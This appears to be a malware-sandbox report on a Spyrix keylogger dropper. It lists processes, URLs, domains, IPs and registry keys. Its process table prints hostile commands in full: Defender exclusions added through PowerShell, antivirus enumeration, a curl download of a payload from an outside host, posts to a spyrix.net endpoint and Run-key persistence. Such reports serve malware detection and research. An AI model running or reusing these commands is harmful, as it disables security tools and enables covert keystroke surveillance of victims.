Chrome Cache Entry: 663
|
ASCII text, with very long lines (1097)
|
downloaded
|
||
Chrome Cache Entry: 664
|
HTML document, ASCII text
|
downloaded
|
||
Chrome Cache Entry: 665
|
C++ source, Unicode text, UTF-8 text
|
dropped
|
||
Chrome Cache Entry: 666
|
ASCII text, with very long lines (2720)
|
downloaded
|
||
Chrome Cache Entry: 667
|
PNG image data, 184 x 184, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
Chrome Cache Entry: 668
|
Java source, ASCII text, with very long lines (1391)
|
downloaded
|
||
Chrome Cache Entry: 669
|
Java source, Unicode text, UTF-8 text, with very long lines (5161)
|
downloaded
|
||
Chrome Cache Entry: 670
|
ASCII text, with very long lines (5945)
|
downloaded
|
||
Chrome Cache Entry: 671
|
Java source, Unicode text, UTF-8 text, with very long lines (5161)
|
dropped
|
||
Chrome Cache Entry: 672
|
Java source, ASCII text, with very long lines (837)
|
downloaded
|
||
Chrome Cache Entry: 673
|
Java source, ASCII text, with very long lines (795)
|
downloaded
|
||
\Device\ConDrv
|
ASCII text, with CR, LF line terminators
|
dropped
|
||
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 1025 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\404.exe
|
"C:\Users\user\Desktop\404.exe"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"cmd.exe" /c C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\\38b5bf3b-2a32-4636-ac09-779581aade41.cmd
|
||
C:\Windows\SysWOW64\reg.exe
|
reg query "HKU\S-1-5-19\Environment"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41'"
|
||
C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\404.exe
|
"C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\404.exe"
|
||
C:\Users\user\AppData\Local\Temp\is-PDS4H.tmp\404.tmp
|
"C:\Users\user\AppData\Local\Temp\is-PDS4H.tmp\404.tmp" /SL5="$70296,32862490,227328,C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\404.exe"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\d.cmd
|
||
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
/value"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\d.cmd
|
||
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
/value"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\ex.cmd
|
||
C:\Windows\System32\reg.exe
|
reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\ex"
/y
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\pswd.cmd
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -ExclusionProcess '404.*'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\ex.cmd
|
||
C:\Windows\System32\reg.exe
|
reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\ex"
/y
|
||
C:\Windows\SysWOW64\regedit.exe
|
"regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix
Free Keylogger_is1"
|
||
C:\Windows\SysWOW64\reg.exe
|
"reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
|
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe"
|
||
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c plist.cmd
|
||
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user\AppData\Local\Temp\nse"
|
||
C:\Windows\SysWOW64\NETSTAT.EXE
|
netstat.exe -e
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
|
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_6E3F587357F4ED7D7098E81DD0F931D7
https://spyrix.net/dashboard/prg-actions
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
|
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_6E3F587357F4ED7D7098E81DD0F931D7
https://spyrix.net/dashboard/prg-actions
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
|
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_6E3F587357F4ED7D7098E81DD0F931D7
https://spyrix.net/dashboard/prg-actions
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe
|
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
|
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_6E3F587357F4ED7D7098E81DD0F931D7
https://spyrix.net/dashboard/prg-actions
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c exit 83
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c exit 112
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
|
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_6E3F587357F4ED7D7098E81DD0F931D7
https://spyrix.net/dashboard/prg-actions
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c exit 121
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c exit 114
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c exit 105
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c exit 120
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\curl.exe
|
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\l"
https://cdnbaynet.com/loader/link.php?prg_id=sfk
|
||
C:\Windows\SysWOW64\curl.exe
|
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\404.exe"
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\wbem\WMIC.exe
|
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\wbem\WMIC.exe
|
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\taskkill.exe
|
"C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM
akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\taskkill.exe
|
"C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM
akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\chcp.com
|
chcp 65001
|
||
C:\Windows\SysWOW64\timeout.exe
|
timeout 20
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\timeout.exe
|
timeout 6
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1992,i,7642433025411638348,18067378609004413491,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\tasklist.exe
|
TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
|
||
C:\Windows\SysWOW64\find.exe
|
find "spm"
|
||
C:\Windows\SysWOW64\tasklist.exe
|
TASKLIST /FI "IMAGENAME eq sem.exe" /FO CSV /NH
|
||
C:\Windows\SysWOW64\find.exe
|
find "sem"
|
||
C:\Windows\SysWOW64\tasklist.exe
|
TASKLIST /FI "IMAGENAME eq spkl.exe" /FO CSV /NH
|
||
C:\Windows\SysWOW64\find.exe
|
find "spkl"
|
||
C:\Windows\SysWOW64\tasklist.exe
|
TASKLIST /FI "IMAGENAME eq clv.exe" /FO CSV /NH
|
||
C:\Windows\SysWOW64\find.exe
|
find "clv"
|
There are 70 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://www.jrsoftware.org/0
|
unknown
|
||
https://dashboard.spyrix.com/account/login-from-program?email=
|
unknown
|
||
https://api.dropbox.com/1/fileops/copy
|
unknown
|
||
https://dashboard.spyrix.com/account/login-from-program
|
unknown
|
||
https://spyrix.net/usr/monitor/
|
unknown
|
||
https://Spyrix.net/dashboard/prg-list
|
158.69.117.119
|
||
https://curl.haxx.se/libcurl/c/curl_easy_setopt.html
|
unknown
|
||
https://dashboard.spyrix.com/qqS
|
unknown
|
||
https://www.spyrix.com/purchase.php?prg=sfk
|
unknown
|
||
http://filedn.comd
|
unknown
|
||
http://www.indyproject.org/
|
unknown
|
||
https://api.dropbox.com/1/fileops/delete
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe_F
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/Input-34212571.css
|
95.181.182.182
|
||
https://api.dropbox.com/1/oauth/request_token
|
unknown
|
||
https://curl.haxx.se/docs/http-cookies.html#
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.exe
|
unknown
|
||
http://www.spyrix.com/pro_upgrade.htm?lic=
|
unknown
|
||
https://spyrix.app/manual/kaspersky-loader/step1
|
unknown
|
||
https://spyrix.app/manual/kaspersky-loader/step2
|
unknown
|
||
http://crl.certum.pl/ca.crl0:
|
unknown
|
||
https://spyrix.net/dashboard/av
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C:
|
unknown
|
||
https://spyrix.net/dashboard/prg-actions
|
158.69.117.119
|
||
https://cdn.cdndownload.net/proxy/list.json
|
unknown
|
||
https://curl.haxx.se/docs/copyright.htmlD
|
unknown
|
||
https://cdnbaynet.com/loader/link.php?prg_id=sfk
|
167.114.14.170
|
||
https://cdn.cdndownload.net/dashboard30/assets/index-1178777c.js
|
95.181.182.182
|
||
https://dashboard.actualkeylogger.com/account/login-from-program
|
unknown
|
||
https://dashboard.spyrix.com/cdn.js
|
158.69.117.119
|
||
http://www.myspace.com/search/
|
unknown
|
||
https://api.dropbox.com/1/fileops/create_folder?
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.js
|
95.181.182.182
|
||
HTTPS://SPYRIX.NET/DASHBOARD/PRG-LIST
|
unknown
|
||
https://dashboard.spyrix.com/;
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
|
167.114.14.168
|
||
https://www.spyrix.com
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://www.spyrix.com
|
unknown
|
||
https://api.dropbox.com/1/oauth/access_token?SV
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/ButtonTemplate-fd9601a7.css
|
95.181.182.182
|
||
http://www.innosetup.com/
|
unknown
|
||
https://spyrix.net/dashboard/proxy/upload
|
unknown
|
||
http://www.spyrix.com/terms-of-use.php)
|
unknown
|
||
https://dashboard.spyrix.com/login
|
|||
http://www.indyproject.org/Original
|
unknown
|
||
http://spyrix.com/manual.php
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/Nunito-Bold-765bfff4.woff2
|
95.181.182.182
|
||
https://api-content.dropbox.com/1/files_put?
|
unknown
|
||
https://api.dropbox.com/1/shares/dropbox
|
unknown
|
||
HTTPS://DASHBOARD.SPYRIX.COM/
|
unknown
|
||
https://dashboard.spyrix.com/.spyrix.com/
|
unknown
|
||
https://api-content.dropbox.com/1/files/dropbox
|
unknown
|
||
https://api.dropbox.com/1/delta
|
unknown
|
||
http://www.actualkeylogger.com/help.html
|
unknown
|
||
https://dashboard.spyrix.com/
|
|||
https://dashboard.spyrix.com/6s
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/Modal-04ffda94.css
|
95.181.182.182
|
||
https://api-content.dropbox.com/1/files_put
|
unknown
|
||
https://www.spyrix.come
|
unknown
|
||
https://dashboard.spyrix.com
|
unknown
|
||
https://www.certum.pl/repository.0
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.css
|
95.181.182.182
|
||
https://swtb-download.spyrix-sfk.com/do
|
unknown
|
||
https://dashboard.spyrix.com/favicon.ico
|
158.69.117.119
|
||
https://cdn.cdndownload.net/dashboard30/assets/Text.vue_vue_type_script_setup_true_lang-a664542d.js
|
95.181.182.182
|
||
https://api.dropbox.com/1/oauth/request_token?
|
unknown
|
||
https://curl.haxx.se/docs/sslcerts.htmlcurl
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js
|
95.181.182.182
|
||
http://rc.qzone.qq.com/qzonesoso/?search
|
unknown
|
||
https://spyrix.net/Uwas771wvshs7916gjqg62417/core.php
|
unknown
|
||
https://spyrix.net/das
|
unknown
|
||
https://api.dropbox.com/1/metadata/sandbox
|
unknown
|
||
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/
|
unknown
|
||
https://spyrix.net/usr/monitor/access.txt
|
unknown
|
||
https://dashboard.clevercontrol.com/account/user-hash-gen
|
unknown
|
||
http://www.actualkeylogger.com/help.html#registrate
|
unknown
|
||
http://www.ok.ru/dk?st.cmd=searchResult
|
unknown
|
||
http://repository.certum.pl/l3.cer0
|
unknown
|
||
https://api.dropbox.com/1/fileops/create_folder
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/Modal.module-d62c47b8.js
|
95.181.182.182
|
||
https://cdn.cdndownload.net/dashboard30/assets/Nunito-Regular-73dcaa51.woff2
|
95.181.182.182
|
||
https://cdn.cdndownload.net/dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js
|
95.181.182.182
|
||
http://html4/loose.dtd
|
unknown
|
||
https://api.dropbox.com/1/oauth/access_token
|
unknown
|
||
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeWinsta0
|
unknown
|
||
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s150
|
23.109.93.100
|
||
http://ocsp.certum.pl0.
|
unknown
|
||
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
|
unknown
|
||
https://swtb-download.s
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/en-08b2a987.js
|
95.181.182.182
|
||
http://neftali.clubdelphi.com/
|
unknown
|
||
http://www.actualkeylogger.com/help.html#registratehttp://www.spyrix.com/manual.php#registrateU
|
unknown
|
||
https://filedn.com
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/ButtonTemplate.module-c837805f.js
|
95.181.182.182
|
||
https://api.dropbox.com/1/account/info?
|
unknown
|
||
https://api.dropbox.com/1/fileops/copy?
|
unknown
|
||
https://curl.haxx.se/docs/http-cookies.html
|
unknown
|
||
https://cdn.cdndownload.net/dashboard30/assets/Button-ca236c00.css
|
95.181.182.182
|
||
https://cdn.cdndownload.net/dashboard30/assets/Button.vue_vue_type_script_setup_true_lang-56edf5a6.js
|
95.181.182.182
|
There are 90 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
swtb-download.spyrix-sfk.com
|
167.114.14.168
|
||
spyrix.net
|
158.69.117.119
|
||
dashboard.spyrix.com
|
158.69.117.119
|
||
www.google.com
|
142.250.186.100
|
||
filedn.com
|
23.109.93.100
|
||
cl-e0469d03.edgecdn.ru
|
95.181.182.182
|
||
cdnbaynet.com
|
167.114.14.170
|
||
cdn.cdndownload.net
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
192.168.2.5
|
unknown
|
unknown
|
||
167.114.14.168
|
swtb-download.spyrix-sfk.com
|
Canada
|
||
239.255.255.250
|
unknown
|
Reserved
|
||
158.69.117.119
|
spyrix.net
|
Canada
|
||
167.114.14.170
|
cdnbaynet.com
|
Canada
|
||
95.181.182.182
|
cl-e0469d03.edgecdn.ru
|
Russian Federation
|
||
142.250.186.100
|
www.google.com
|
United States
|
||
127.0.0.1
|
unknown
|
unknown
|
||
23.109.93.100
|
filedn.com
|
Netherlands
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
|
localSPM
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
|
localmon
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
Owner
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
SessionHash
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
Sequence
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\EnumKreg\value
|
tid
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
RegFiles0000
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
RegFilesHash
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
|
kbdsprt
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
|
localSPM
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
Inno Setup: Setup Version
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
Inno Setup: App Path
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
InstallLocation
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
Inno Setup: Icon Group
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
Inno Setup: User
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
Inno Setup: Language
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
DisplayName
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
UninstallString
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
QuietUninstallString
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
DisplayVersion
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
NoModify
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
NoRepair
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
InstallDate
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
MajorVersion
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
MinorVersion
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
VersionMajor
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
VersionMinor
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
EstimatedSize
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum
|
Version
|
||
